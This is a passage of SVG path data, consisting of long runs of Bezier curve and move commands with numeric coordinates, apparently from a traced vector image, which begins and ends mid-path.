1015.1225,292 1014.3215,292 C 1012.1445,292 1013.6377,287.94933 1016.792,285.29835 C 1018.5347,283.83365 1019.7945,283.41446 1020.5555,284.04602 C 1022.2856,285.48195 1026.7554,281.35536 1025.1782,279.77817 C 1024.2739,278.87394 1024,278.87902 1024,279.8 C 1024,280.46 1023.19,281 1022.2,281 C 1021.21,281 1019.8568,281.54321 1019.1929,282.20714 C 1018.25,283.15 1017.6041,283.03262 1016.2429,281.67098 C 1014.718,280.14569 1014.6876,279.80905 1016,278.97915 C 1017.2787,278.17055 1017.2418,278.02837 1015.75,278.01531 C 1013.991,277.99992 1013.599,276.43157 1013.959,270.84917 C 1014.053,269.39121 1013.7157,267.94233 1013.2094,267.62943 C 1012.7012,267.31531 1012.5004,268.16661 1012.761,269.53026 C 1013.0207,270.88862 1012.7824,272 1012.2316,272 C 1010.8717,272 1007.7839,267.15871 1008.4531,266.07583 C 1008.7481,265.59861 1008.3195,263.92382 1007.5009,262.35408 C 1005.6171,258.74219 1005.6189,257.23826 1007.5092,255.34795 C 1008.3392,254.5179 1008.7684,253.43434 1008.4629,252.94005 C 1008.1575,252.44575 1008.374,251.16978 1008.944,250.10455 C 1009.7698,248.56168 1010.5418,248.32631 1012.7403,248.94726 C 1014.2581,249.37598 1015.3717,250.2856 1015.2149,250.96863 C 1015.0581,251.65167 1015.4347,252.81882 1016.0517,253.5623 C 1016.892,254.57475 1016.8155,255.42533 1015.7471,256.95068 C 1014.9625,258.07081 1014.0985,258.76514 1013.827,258.49364 C 1013.5555,258.22214 1013.3333,258.675 1013.3333,259.5 C 1013.3333,260.325 1013.7083,261 1014.1667,261 C 1014.625,261 1015,261.675 1015,262.5 C 1015,263.84976 1017.2382,264.43621 1021.75,264.26865 C 1023.375,264.2083 1023.375,266.68204 1021.75,267.33772 C 1020.7887,267.72563 1020.8023,267.86034 1021.809,267.92105 C 1022.529,267.96447 1022.8399,268.45 1022.5,269 C 1022.1495,269.56716 1022.9896,270 1024.441,270 C 1025.9834,270 1027,270.5634 1027,271.41821 C 1027,272.19823 1027.2731,273.54823 1027.607,274.41821 C 1028.0108,275.47052 1027.6563,276 1026.548,276 C 1025.6317,276 1025.1646,276.45734 1025.5101,277.01631 C 1025.8555,277.57528 1026.5571,277.77373 1027.0691,277.45729 C 1027.5811,277.14086 1028,277.80852 1028,278.94098 C 1028,280.07344 1028.3999,281 1028.8887,281 C 1029.3775,281 1030.0678,282.54806 1030.4228,284.44012 C 1031.133,288.22596 1030.2417,293.26744 1028.9981,292.49883 C 1028.5644,292.23079 1027.9515,292.6839 1027.6362,293.50574 C 1026.9258,295.35699 1026.1144,295.32366 1023.25,293.32558 z M 1021,274.05902 C 1021,273.54148 1020.55,272.83992 1020,272.5 C 1019.45,272.16008 1019,272.58352 1019,273.44098 C 1019,274.29844 1019.45,275 1020,275 C 1020.55,275 1021,274.57656 1021,274.05902 z M 1018.2672,271.08625 C 1018.6062,269.78989 1018.1599,269.01357 1016.8838,268.67987 C 1015.8477,268.40892 1015,268.59511 1015,269.09362 C 1015,269.59213 1015.45,270 1016,270 C 1016.55,270 1017,270.47656 1017,271.05902 C 1017,271.64148 1016.55,271.83992 1016,271.5 C 1015.45,271.16008 1015,271.35852 1015,271.94098 C 1015,273.7961 1017.7464,273.0776 1018.2672,271.08625 z M 1010,293 C 1010,291.70609 1011.7003,291.70609 1012.5,293 C 1012.8399,293.55 1012.4165,294 1011.559,294 C 1010.7016,294 1010,293.55 1010,293 z M 997,285.2274 C 997,284.66779 998.1449,283.15019 999.54422,281.85496 C 1000.9435,280.55973 1002.795,278.18536 1003.6585,276.57859 C 1005.0348,274.01783 1005.3463,273.8675 1006.1821,275.36085 C 1006.9222,276.6834 1006.3933,277.78489 1003.8177,280.2847 C 999.06931,284.89351 997,286.39372 997,285.2274 z M 910,277 C 910,276.45 910.45,276 911,276 C 911.55,276 912,276.45 912,277 C 912,277.55 911.55,278 911,278 C 910.45,278 910,277.55 910,277 z M 910.70217,274.32712 C 910.35722,273.76897 910.60329,271.55454 911.24901,269.40615 C 912.28925,265.94511 912.46115,265.78927 912.75753,268.0385 C 913.15359,271.0442 911.6038,275.78598 910.70217,274.32712 z M 1006.6395,273.30615 C 1005.5133,272.17996 1005.9536,271 1007.5,271 C 1008.325,271 1009,271.42344 1009,271.94098 C 1009,273.20196 1007.4384,274.10508 1006.6395,273.30615 z M 773.66667,271.33333 C 772.3691,270.03577 773.02842,269.27605 775.25,269.50891 C 778.54631,269.85443 778.64394,269.93761 777,271 C 775.21113,272.15606 774.555,272.22167 773.66667,271.33333 z M 376,268 C 376,266.71862 376.70806,266.71862 377.5,268 C 377.83992,268.55 377.64148,269 377.05902,269 C 376.47656,269 376,268.55 376,268 z M 1093,267.55902 C 1093,267.31648 1093.45,266.83992 1094,266.5 C 1094.55,266.16008 1095,266.35852 1095,266.94098 C 1095,267.52344 1094.55,268 1094,268 C 1093.45,268 1093,267.80156 1093,267.55902 z M 372.01118,266.75 C 371.86753,266.3375 371.67456,265.6625 371.58235,265.25 C 371.49015,264.8375 370.82655,262.78235 370.10769,260.683 C 368.80676,256.88377 369.04987,255.29475 370.76947,256.35752 C 371.26586,256.66431 371.58899,257.94687 371.48754,259.20766 C 371.38609,260.46845 371.72426,261.77589 372.23903,262.11309 C 372.75381,262.45029 372.97189,263.80029 372.72367,265.11309 C 372.47545,266.42589 372.15483,267.1625 372.01118,266.75 z M 502.66667,262.33333 C 502.3,261.96667 502,261.20167 502,260.63333 C 502,260.00673 502.46577,260.06577 503.18333,260.78333 C 503.83417,261.43417 504.13417,262.19917 503.85,262.48333 C 503.56583,262.7675 503.03333,262.7 502.66667,262.33333 z M 505,258 C 505,257.45 505.45,257 506,257 C 506.55,257 507,257.45 507,258 C 507,258.55 506.55,259 506,259 C 505.45,259 505,258.55 505,258 z M 497,255.11803 C 497,254.56803 497.45,253.83992 498,253.5 C 498.55,253.16008 499,253.33197 499,253.88197 C 499,254.43197 498.55,255.16008 498,255.5 C 497.45,255.83992 497,255.66803 497,255.11803 z M 313.23564,251.69194 C 310.29291,250.37886 310.38642,249 313.41821,249 C 316.36427,249 319,249.93985 319,250.99036 C 319,252.32044 315.57765,252.73698 313.23564,251.69194 z M 334,251.86833 C 334,251.12716 332.63324,250.91998 330.03912,251.26793 C 327.42554,251.61848 325.70826,251.3534 324.99056,250.48862 C 323.61979,248.83695 325.16939,247.74403 327.5738,248.66669 C 328.77147,249.12628 329.09867,248.96867 328.60503,248.16994 C 328.19772,247.5109 328.4536,246.96552 329.19098,246.92105 C 330.19772,246.86034 330.21135,246.72563 329.25,246.33772 C 326.41788,245.19494 328.32314,244.11702 333.10965,244.1541 C 338.62691,244.19684 343.88609,245.9529 345.95205,248.44222 C 346.66311,249.299 347.07729,250.03885 346.87244,250.08632 C 346.6676,250.1338 344.26773,250.30562 341.53939,250.46815 C 338.81106,250.63068 336.41106,251.26683 336.20606,251.88183 C 335.71955,253.34134 334,253.33082 334,251.86833 z M 350,250.5 C 350,249.5 351,249 353,249 C 355,249 356,249.5 356,250.5 C 356,251.5 355,252 353,252 C 351,252 350,251.5 350,250.5 z M 38.923489,248.75847 C 38.32945,246.75166 38.36845,245.02187 39.031938,243.94832 C 39.704187,242.8606 40.124656,242.85857 41.423785,243.93675 C 42.290703,244.65623 43,245.53154 43,245.8819 C 43,246.50283 39.075534,249.27212 38.923489,248.75847 z M 313.36163,243.5 C 313.71562,242.57751 313.35972,242 312.43723,242 C 311.61223,242 310.67821,241.325 310.36163,240.5 C 310.04504,239.675 308.73573,239 307.45203,239 C 306.16833,239 304.82524,238.52625 304.46738,237.94721 C 304.10951,237.36818 303.29546,237.08144 302.65836,237.31001 C 302.02126,237.53858 300.28665,237.11326 298.80366,236.36486 C 296.41157,235.15768 295.71624,235.23487 292.64164,237.04893 C 288.53748,239.47044 287.07567,238.21699 290.38171,235.11113 C 292.26523,233.34165 293.99045,232.90958 299.55057,232.81483 C 303.92098,232.74036 306.53821,233.11462 306.78302,233.84906 C 306.99403,234.48208 307.77352,235 308.51522,235 C 309.25693,235 313.5609,236.84486 318.07961,239.09969 C 327.24222,243.67181 327.25609,244.95864 318.14301,244.98469 C 313.78834,244.99713 312.89372,244.71934 313.36163,243.5 z M 35.738972,241.55108 C 34.782537,240.85172 34,240.03375 34,239.73338 C 34,238.94453 37.937504,240.08986 38.531896,241.05161 C 39.433003,242.50963 37.518178,242.85207 35.738972,241.55108 z M 327.22894,240.81318 C 327.72722,239.31834 330,238.49529 330,239.80968 C 330,240.34667 329.2874,241.05947 328.41644,241.39369 C 327.44253,241.76742 326.98536,241.54393 327.22894,240.81318 z M 30.5,239 C 30.160081,238.45 30.331966,238 30.881966,238 C 31.431966,238 32.160081,238.45 32.5,239 C 32.839919,239.55 32.668034,240 32.118034,240 C 31.568034,240 30.839919,239.55 30.5,239 z M 294,238.5 C 294,237.58333 294.5625,237.02083 295.25,237.25 C 296.66567,237.72189 296.51005,239.32998 295,239.83333 C 294.45,240.01667 294,239.41667 294,238.5 z M 25,237 C 25,236.45 25.701558,236 26.559017,236 C 27.416476,236 27.839919,236.45 27.5,237 C 26.700321,238.29391 25,238.29391 25,237 z M 1008.2405,236.01357 C 1006.4856,233.2034 1006.6663,232.12626 1009.5209,228.38378 C 1012.6697,224.25538 1015.2317,224.70527 1013.9535,229.16216 C 1012.806,233.16307 1010.6404,238 1009.9964,238 C 1009.713,238 1008.9228,237.10611 1008.2405,236.01357 z M 325.63617,235.50574 C 325.95154,234.6839 326.61976,234.265 327.1211,234.57484 C 328.16968,235.2229 327.32792,237 325.97237,237 C 325.47209,237 325.3208,236.32758 325.63617,235.50574 z M 322.18333,233.78333 C 321.5325,233.1325 321,232.20786 321,231.72857 C 321,231.24929 321.72857,231.58571 322.61905,232.47619 C 323.50952,233.36667 324.04202,234.29131 323.80238,234.53095 C 323.56274,234.7706 322.83417,234.43417 322.18333,233.78333 z M 311.89953,229.7173 C 310.85161,228.91908 310.54037,227.81032 310.998,226.50571 C 311.62858,224.70807 311.86093,224.83039 313.37414,227.75662 C 315.12133,231.1353 314.62592,231.79402 311.89953,229.7173 z M 318.01531,227.97076 C 318.00689,227.12968 317.1,225.79284 316,225 C 314.9,224.20716 314,222.93404 314,222.17083 C 314,221.15905 313.25511,220.96715 311.25,221.46235 C 309.43686,221.91015 308.84068,221.80521 309.5,221.15434 C 311.35374,219.32434 314.21683,219.46919 315.36736,221.45116 C 315.99031,222.5243 317.28491,224.0993 318.24424,224.95116 C 319.49667,226.06328 319.71246,226.92295 319.00956,228 C 318.14376,229.32665 318.02886,229.32327 318.01531,227.97076 z M 1034.2292,221.8125 C 1034.4469,221.15938 1035.1597,220.44677 1035.8132,220.22894 C 1036.5439,219.98536 1036.7674,220.44253 1036.3937,221.41644 C 1035.6962,223.23415 1033.6292,223.61236 1034.2292,221.8125 z M 530.59656,217.15623 C 530.25051,216.59631 530.45466,215.83704 531.05022,215.46896 C 532.5877,214.51875 533.57969,215.82031 532.2962,217.1038 C 531.57802,217.82198 531.01868,217.83923 530.59656,217.15623 z M 526.66667,216.33333 C 525.40539,215.07205 526.00357,214 527.96862,214 C 529.30765,214 529.75315,214.47971 529.36163,215.5 C 528.746,217.10429 527.74664,217.41331 526.66667,216.33333 z M 535,216.19112 C 535,214.98122 538.03905,211 538.96262,211 C 540.17339,211 537.75162,215.86627 536.25,216.45072 C 535.5625,216.7183 535,216.60148 535,216.19112 z M 1039.5,215 C 1039.8399,214.45 1040.568,214 1041.118,214 C 1041.668,214 1041.8399,214.45 1041.5,215 C 1041.1601,215.55 1040.432,216 1039.882,216 C 1039.332,216 1039.1601,215.55 1039.5,215 z M 523,214.05902 C 523,213.47656 523.45,213 524,213 C 525.28138,213 525.28138,213.70806 524,214.5 C 523.45,214.83992 523,214.64148 523,214.05902 z M 1043.5433,208.07002 C 1043.2568,207.60657 1043.9174,206.99335 1045.0112,206.70731 C 1046.1051,206.42127 1047,206.54697 1047,206.98663 C 1047,208.16156 1044.1516,209.05429 1043.5433,208.07002 z M 525.27083,199.39583 C 525.60312,199.06354 526.46563,199.02802 527.1875,199.31689 C 527.98523,199.63611 527.74828,199.87307 526.58333,199.92105 C 525.52917,199.96447 524.93854,199.72813 525.27083,199.39583 z M 1029,197 C 1029,196.45 1029.675,196 1030.5,196 C 1031.325,196 1032,196.45 1032,197 C 1032,197.55 1031.325,198 1030.5,198 C 1029.675,198 1029,197.55 1029,197 z M 495.51008,182.01631 C 495.16462,181.45734 495.58352,181 496.44098,181 C 498.19751,181 498.45614,181.60006 497.0691,182.45729 C 496.5571,182.77373 495.85554,182.57528 495.51008,182.01631 z M 485.27083,179.39583 C 485.60312,179.06354 486.46562,179.02802 487.1875,179.31689 C 487.98523,179.63611 487.74828,179.87307 486.58333,179.92105 C 485.52917,179.96447 484.93854,179.72813 485.27083,179.39583 z M 1111,153.5 C 1111.6847,152.675 1112.9508,152 1113.8136,152 C 1115.0694,152 1114.9951,152.29285 1113.4411,153.4682 C 1110.9015,155.38905 1109.4162,155.4084 1111,153.5 z M 1128,141.55902 C 1128,141.31648 1128.45,140.83992 1129,140.5 C 1129.55,140.16008 1130,140.35852 1130,140.94098 C 1130,141.52344 1129.55,142 1129,142 C 1128.45,142 1128,141.80156 1128,141.55902 z M 1130.5703,138.11369 C 1130.269,137.62622 1131.0103,136.96907 1132.2176,136.65335 C 1134.7376,135.99437 1135.485,136.40618 1134.5411,137.93347 C 1133.7418,139.2268 1131.326,139.33644 1130.5703,138.11369 z M 1224,133 C 1224,132.45 1224.7016,132 1225.559,132 C 1226.4165,132 1226.8399,132.45 1226.5,133 C 1225.7003,134.29391 1224,134.29391 1224,133 z M 1228.125,133.125 C 1228.5432,131.87026 1230,131.57891 1230,132.75 C 1230,133.1625 1229.4938,133.66875 1228.875,133.875 C 1228.2562,134.08125 1227.9188,133.74375 1228.125,133.125 z M 1216,132 C 1216,130.71862 1216.7081,130.71862 1217.5,132 C 1217.8399,132.55 1217.6415,133 1217.059,133 C 1216.4766,133 1216,132.55 1216,132 z M 121.19876,128.89007 C 117.58839,125.36026 117.81896,124 122.02763,124 C 124.20972,124 124.79257,124.37699 124.35866,125.50772 C 124.04045,126.33697 124.51495,128.13697 125.4131,129.50772 C 127.81197,133.16886 125.18078,132.78323 121.19876,128.89007 z M 1235.6649,131.00033 C 1236.8717,130.51372 1239.0844,130.50374 1240.6649,130.97776 C 1243.1146,131.71251 1242.8203,131.83116 1238.5,131.85066 C 1234.6799,131.8679 1234.0109,131.66724 1235.6649,131.00033 z M 1191.5,129 C 1191.1601,128.45 1191.557,128 1192.382,128 C 1193.207,128 1194.1601,128.45 1194.5,129 C 1194.8399,129.55 1194.443,130 1193.618,130 C 1192.793,130 1191.8399,129.55 1191.5,129 z M 1256.4243,128.08368 C 1258.3694,125.93429 1260,125.36693 1260,126.83948 C 1260,127.3012 1258.7712,128.23886 1257.2693,128.92317 C 1254.5454,130.16424 1254.5433,130.16213 1256.4243,128.08368 z M 0,125.5 C 0,124.675 0.675,124 1.5,124 C 2.325,124 3,124.675 3,125.5 C 3,126.325 2.325,127 1.5,127 C 0.675,127 0,126.325 0,125.5 z M 1168.9985,121.45361 C 1167.55,120.65197 1167.1304,120.06241 1168,120.05075 C 1169.7862,120.02679 1172.6423,121.69104 1171.9695,122.3638 C 1171.7096,122.6237 1170.3727,122.21411 1168.9985,121.45361 z M 305,118.12244 C 305,116.70496 307.82392,114.77314 308.91252,115.44594 C 310.47276,116.41021 309.00117,119 306.89301,119 C 305.85186,119 305,118.6051 305,118.12244 z M 43.302767,114.43753 C 41.629599,113.17518 41.733638,112.98697 44.75,111.81946 C 46.5375,111.1276 48,110.21018 48,109.78076 C 48,109.35134 49.097033,109 50.437851,109 C 54.39153,109 53.324839,112.56902 48.845249,114.32865 C 45.680565,115.57178 44.828336,115.58852 43.302767,114.43753 z M 1.25,104.34923 C -1.0748323,103.38973 -0.018750877,101.865 2.75,102.18358 C 4.2625,102.35761 5.5,102.94384 5.5,103.4863 C 5.5,104.61955 3.0904039,105.10879 1.25,104.34923 z M 425.5201,102.75814 C 423.5545,101.74973 421.39587,101.01492 420.72314,101.12523 C 417.64492,101.62998 413.23796,99.29637 409.05627,94.947279 C 399.67274,85.188122 397.59231,82.451024 397.31502,79.5 C 396.92043,75.300593 398.12457,73.908758 402.34185,73.689619 C 405.02525,73.550184 405.99222,73.05247 405.99552,71.809017 C 405.99798,70.878976 405.55,69.839919 405,69.5 C 404.45,69.160081 404,69.302274 404,69.815983 C 404,71.264136 398.28733,72.059739 395.49957,70.999837 C 392.64745,69.915464 392.44777,69.137481 394.35284,66.532138 C 395.54812,64.897503 396.21407,64.811059 400.07057,65.789945 C 402.47126,66.399304 404.63436,66.698975 404.87745,66.45588 C 405.12055,66.212785 403.90487,65.730975 402.17595,65.385191 C 400.44703,65.039407 399.27672,64.361282 399.57525,63.878246 C 400.27198,62.750909 399.72873,62.77244 396.49962,64.000143 C 392.8794,65.376549 390.39574,63.872993 390.5479,60.397092 C 390.68995,57.152103 388.30234,53.94675 386.31205,54.710495 C 385.54544,55.004672 384.9899,54.852656 385.07753,54.372681 C 385.51766,51.961783 384.7658,51 382.44098,51 C 381.03352,51 380.12893,50.600406 380.43077,50.112013 C 380.73262,49.62362 378.84667,48.853104 376.23979,48.399756 C 370.08455,47.329334 350.85018,47.256304 352.34851,48.309044 C 354.09993,49.539603 344.91881,47.978529 341.5,46.464461 C 339.85,45.733736 337.6,44.948844 336.5,44.720255 C 334.66417,44.338756 334.70522,44.215254 337,43.215706 C 339.43974,42.15302 339.41564,42.123551 336,41.993101 C 334.075,41.919582 331.66887,41.532366 330.65305,41.132621 C 326.16025,39.364621 333.50234,37.45144 349,36.351825 C 356.11095,35.847278 359.849,34 353.75902,34 C 347.98147,34 348.44828,32.256332 354.56583,30.986333 C 357.64186,30.347752 359.97412,29.640783 359.74862,29.41529 C 359.07042,28.737086 348.42965,30.959901 342.36342,33.046989 C 339.24134,34.121145 335.4636,35 333.96845,35 C 329.29032,35 325,36.197708 325,37.50368 C 325,39.16584 319.45212,41.4 315.32464,41.4 C 313.34757,41.4 312.52342,41.713924 313.26459,42.184687 C 314.10799,42.720381 313.86537,42.996536 312.5,43.054972 C 310.55494,43.138219 310.55311,43.16137 312.43362,43.897783 C 314.02361,44.520426 314.11268,44.812325 312.93482,45.540283 C 312.14699,46.027192 310.82686,46.477845 310.0012,46.541735 C 309.17554,46.605626 307.15,46.752889 305.5,46.868987 L 302.5,47.080075 L 305.25,48.571975 C 311.3919,51.904013 307.60268,53.049898 288.70346,53.575749 C 281.11536,53.786879 275.11117,53.631208 275.36082,53.229811 C 275.61046,52.828415 273.13922,52.653336 269.86916,52.840747 C 263.46867,53.207566 260.11295,51.773758 262.01319,49.484104 C 263.41397,47.796267 261.22663,47.026813 254.66821,46.90032 C 248.002,46.771748 244.01863,45.724552 245.86206,44.585251 C 246.6001,44.129115 252.16015,44.077137 258.21772,44.469744 C 266.0857,44.979688 269.03876,44.871735 268.55673,44.091788 C 268.18561,43.491304 267.15852,43 266.27432,43 C 265.39011,43 264.97926,42.687406 265.36132,42.305346 C 265.74338,41.923287 263.68088,40.874252 260.77799,39.974157 C 257.71983,39.025921 255.61449,37.818021 255.77221,37.102191 C 255.92192,36.422703 255.24692,35.955183 254.27221,36.063256 C 251.76208,36.341572 246,34.897433 246,33.99001 C 246,31.873173 252.95634,29.170394 260,28.550529 C 261.925,28.381123 266.17274,27.699387 269.43942,27.035561 C 272.7061,26.371734 276.6436,26.014231 278.18942,26.241109 C 279.73524,26.467987 281,26.315817 281,25.902954 C 281,25.490091 284.4875,24.917609 288.75,24.630771 C 293.0125,24.343933 302.125,23.609461 309,22.998612 C 316.50395,22.33188 328.49447,22.152013 339,22.548589 C 362.3386,23.429605 363.85879,23.529506 368.48333,24.486139 C 371.84196,25.180902 372.15562,25.442053 370.48333,26.15131 C 369.35659,26.629192 370.8754,26.670193 374,26.246245 C 377.025,25.83581 385.0125,25.502203 391.75,25.504896 C 398.4875,25.507589 404,25.124681 404,24.653989 C 404,24.183297 406.5875,23.912549 409.75,24.052326 C 420.23354,24.515682 425.66381,24.084022 424,22.919572 C 422.92735,22.168857 425.70512,21.980846 433.75,22.259652 C 439.9375,22.474087 445,22.278389 445,21.824767 C 445,20.579921 488.77178,20.870665 494,22.150238 C 496.475,22.755978 499.85,23.195885 501.5,23.127809 C 503.15,23.059732 505.85,23.414447 507.5,23.916064 C 509.23566,24.443721 509.73156,24.864319 508.67668,24.914047 C 507.4897,24.970002 506.97957,25.610758 507.21499,26.75 C 507.43582,27.818606 508.34045,28.40159 509.53831,28.247256 C 520.92338,26.780401 535.31438,26.602273 541,27.857831 C 544.36119,28.600085 544.22238,28.682305 537.5,29.930932 C 533.65,30.646039 528.5303,32.079122 526.12288,33.115563 C 523.71547,34.152003 520.56547,35.031628 519.12288,35.070285 C 516.7989,35.132561 516.72792,35.230391 518.5,35.928749 C 520.21666,36.605266 520.00415,36.824475 517,37.476061 C 515.075,37.893584 513.11446,38.463525 512.64324,38.742597 C 511.42362,39.464895 514.09988,40.96651 516.63922,40.984687 C 517.81578,40.993109 519.71429,41.7875 520.85812,42.75 C 522.68996,44.291445 522.77068,44.720489 521.53544,46.350138 C 520.16482,48.158386 517.40498,47.771775 518.54271,45.930902 C 518.85914,45.418906 517.44148,45 515.39235,45 C 511.92225,45 511.12545,45.880629 514.15837,46.363807 C 514.89627,46.481362 516.4,47.094571 517.5,47.726493 C 519.0722,48.629683 519.24007,49.138 518.2848,50.102923 C 517.33009,51.067283 517.43726,51.609713 518.7848,52.633399 C 520.35367,53.82523 520.30537,53.939107 518.21862,53.968197 C 516.96385,53.985688 515.67821,54.675 515.36163,55.5 C 515.04504,56.325 513.59667,57.001026 512.14301,57.00228 C 509.89767,57.004218 509.48398,57.455603 509.39352,60.00228 C 509.33495,61.651026 509.67245,63 510.14352,63 C 511.47409,63 511.15163,66.629265 509.71514,67.821446 C 509.00847,68.407931 505.29597,69.999415 501.46514,71.358076 C 494.93728,73.673283 492.34564,74.203202 481,75.542642 C 473.68952,76.4057 471.66345,77.032807 468.5,79.411628 C 465.12162,81.952071 459.19026,84.235622 457.95423,83.471712 C 457.50541,83.194327 456.85554,83.424717 456.51008,83.983688 C 456.16462,84.54266 454.07638,85 451.86955,85 C 448.07548,85 444.36914,87.035808 445.71429,88.380952 C 446.05476,88.721429 445.80833,89 445.16667,89 C 444.525,89 444,89.575658 444,90.279241 C 444,90.982823 443.07433,92.220323 441.94295,93.029241 C 440.81157,93.838158 439.06256,96.354428 438.05626,98.62095 C 435.21842,105.01274 431.99093,106.07787 425.5201,102.75814 z M 503.54168,67.270556 C 502.46461,66.996963 500.55211,66.097409 499.29168,65.271547 C 497.77373,64.276945 497,64.157313 497,64.917214 C 497,66.266442 500.64742,67.895657 503.5,67.820612 C 505.44805,67.769364 505.44913,67.755076 503.54168,67.270556 z M 301.25086,47.086941 C 301.66383,46.708179 299.41383,46.510426 296.25086,46.647492 C 293.08789,46.784557 286.45,46.951572 281.5,47.018636 C 275.28092,47.102894 273.11798,47.417967 274.5,48.038318 C 276.69589,49.023998 300.04421,48.19363 301.25086,47.086941 z M 276.58458,42.251242 C 276.30984,41.976503 277.07841,40.885322 278.29252,39.826395 L 280.5,37.901073 L 277.5,39.318658 C 275.85,40.09833 273.62571,40.597669 272.55714,40.4283 C 269.6779,39.971939 268.64275,41.018286 270.5754,42.431476 C 272.12826,43.566954 277.73221,43.398874 276.58458,42.251242 z M 282,33 C 282,32.45 281.2125,32.006891 280.25,32.015313 C 278.75445,32.028399 278.7181,32.171574 280,33 C 281.88721,34.21961 282,34.21961 282,33 z M 276,31.440983 C 276,31.198442 275.29844,31 274.44098,31 C 273.58352,31 273.16462,31.45734 273.51008,32.016312 C 274.08089,32.939894 276,32.496458 276,31.440983 z M 268.93548,29.465472 C 267.65139,28.778246 265.91838,28.477827 265.08435,28.797875 C 263.98238,29.220738 264.37858,29.711415 266.53396,30.593177 C 270.19804,32.09214 272.13976,31.180347 268.93548,29.465472 z M 369.48188,29.029317 C 370.32786,27.660493 365.60709,26.66023 362.82217,27.618218 C 360.66898,28.358896 360.75469,28.465042 364,29.076871 C 365.925,29.439787 367.81094,29.795956 368.19098,29.868359 C 368.57102,29.940761 369.15193,29.563193 369.48188,29.029317 z M 580.43026,103.67885 C 579.6296,101.59236 580.62996,100.22996 581.97503,101.57503 C 582.54305,102.14305 582.55778,103.0975 582.01215,103.98033 C 581.24492,105.22174 581.00475,105.17596 580.43026,103.67885 z M 346,102.46862 C 346,100.85123 347.56262,100.48329 348.43524,101.89522 C 348.73954,102.38758 348.3161,103.04846 347.49426,103.36383 C 346.5866,103.71213 346,103.3607 346,102.46862 z M 357.09549,99.059017 C 356.10095,98.444357 356.07329,98.072736 356.98037,97.512132 C 357.63701,97.106305 358.62426,97.224265 359.17426,97.774265 C 360.47748,99.077482 358.80143,100.11334 357.09549,99.059017 z M 304.44615,97.912868 C 303.58802,96.524389 305.49011,94.566834 306.86919,95.419157 C 308.01765,96.128941 307.28228,99 305.95203,99 C 305.49333,99 304.81569,98.51079 304.44615,97.912868 z M 291.73557,96.402234 C 290.26309,94.929754 292.45896,93 295.60699,93 C 299.63114,93 299.99613,94.225104 296.45295,95.839485 C 293.581,97.148032 292.59856,97.26523 291.73557,96.402234 z M 1251.2489,92.969282 C 1250.0108,92.471171 1248.3233,92.322454 1247.4989,92.638801 C 1246.6021,92.982914 1246,92.645411 1246,91.798669 C 1246,90.791114 1247.0804,90.446163 1249.75,90.601348 C 1253.3162,90.808649 1259.7916,92.803146 1257.3318,92.936614 C 1256.6893,92.971476 1255.5643,93.196862 1254.8318,93.43747 C 1254.0993,93.678079 1252.487,93.467394 1251.2489,92.969282 z M 310.96641,91.958076 C 309.843,91.247559 310.14323,90.991958 312.25,90.865313 C 313.7625,90.774391 315.525,90.655 316.16667,90.6 C 316.80833,90.545 317.48234,90.95 317.66446,91.5 C 318.09561,92.802055 312.86629,93.159686 310.96641,91.958076 z M 516.5,92.021184 C 515.4,91.536846 512.5875,91.108942 510.25,91.070285 C 507.9125,91.031628 506,90.55 506,90 C 506,89.45 506.47656,89 507.05902,89 C 507.64148,89 507.86454,88.589838 507.55471,88.088529 C 507.24489,87.587219 505.85739,87.30154 504.47138,87.453685 C 503.08537,87.60583 501.71074,87.340993 501.41666,86.865156 C 501.12258,86.38932 502.14602,85.940761 503.69098,85.868359 C 506.2205,85.749816 506.15175,85.673486 503,85.101232 L 499.5,84.465746 L 502.24559,82.620754 C 504.26035,81.266865 505.92398,80.950758 508.49559,81.433194 C 510.42301,81.794782 512,82.575335 512,83.167758 C 512,83.934248 512.37227,83.935934 513.29082,83.173603 C 514.00077,82.584396 517.39819,82.115788 520.84065,82.132252 C 524.2831,82.148717 527.65482,81.701437 528.33336,81.138296 C 529.01924,80.569066 530.15641,80.47863 530.89424,80.934635 C 531.62417,81.385761 533.14195,81.514134 534.26707,81.219909 C 535.71011,80.842544 536.08975,81.045772 535.55576,81.909785 C 535.07289,82.691081 535.55944,83.333537 536.89938,83.683939 C 538.05472,83.986067 539,84.839946 539,85.581448 C 539,87.414128 535.58174,89.110294 529,90.543528 C 525.975,91.202249 522.375,92.002336 521,92.3215 C 519.625,92.640663 517.6,92.505521 516.5,92.021184 z M 233,73 C 233,72.45 233.45,72 234,72 C 234.55,72 235,72.45 235,73 C 235,73.55 234.55,74 234,74 C 233.45,74 233,73.55 233,73 z M 755,73.239022 C 755,71.311475 757.97406,69.776675 760.48701,70.407385 C 763.11061,71.065866 763.90935,72.574667 761.75,72.79313 C 761.0625,72.862685 759.2625,73.215145 757.75,73.576374 C 756.15372,73.957613 755,73.816083 755,73.239022 z M 769.78754,64.704164 C 765.96465,62.627557 765.64455,61 769.05902,61 C 770.12656,61 770.8875,60.474289 770.75,59.831753 C 770.6125,59.189218 771.625,58.070852 773,57.346495 C 774.375,56.622139 775.05,56.012967 774.5,55.99278 C 773.95,55.972593 775.4125,55.08796 777.75,54.02693 C 780.0875,52.9659 782,51.588283 782,50.965559 C 782,50.342835 782.5625,50.026842 783.25,50.263353 C 783.9375,50.499863 786.975,49.838865 790,48.794467 C 793.025,47.75007 798.875,46.708097 803,46.478973 C 807.125,46.249849 813.9272,45.527061 818.11599,44.872778 C 826.65359,43.539219 830.30702,44.136928 827.92754,46.477968 C 826.6665,47.718633 818.75123,49.064398 805.1722,50.346859 C 802.79191,50.571664 800.33941,51.260586 799.7222,51.877798 C 799.10499,52.495009 797.86627,53 796.96948,53 C 794.77752,53 786.36949,57.318066 783.2067,60.068074 L 780.65746,62.284604 L 785.07873,64.593916 L 789.5,66.903229 L 781.5,66.812009 C 775.50009,66.743594 772.57184,66.21661 769.78754,64.704164 z M 1212.9991,65.785184 C 1213.0011,64.191058 1217.3452,62.911025 1221.784,63.196599 C 1228.785,63.647005 1227.4934,65.426428 1219.7491,66 C 1216.0361,66.275 1212.9986,66.178333 1212.9991,65.785184 z M 237,64.072003 C 237,63.398306 233.8694,62.241228 227.23548,60.46301 C 222.67672,59.241038 229.00884,55.310436 236.96301,54.424736 C 243.36991,53.711327 246.34058,54.589632 245.7076,57.010153 C 245.39578,58.202524 245.8816,58.997282 247.1203,59.321208 C 249.94091,60.058816 248.39225,62.752188 244.66646,63.588822 C 239.64089,64.717326 237,64.883769 237,64.072003 z M 232,58 C 230.04163,56.734403 228.71782,56.734403 229.5,58 C 229.83992,58.55 230.87898,58.993109 231.80902,58.984687 C 233.26629,58.971491 233.29269,58.835399 232,58 z M 1076.3559,56.75 C 1076.0953,56.3375 1076.6101,56 1077.5,56 C 1078.3899,56 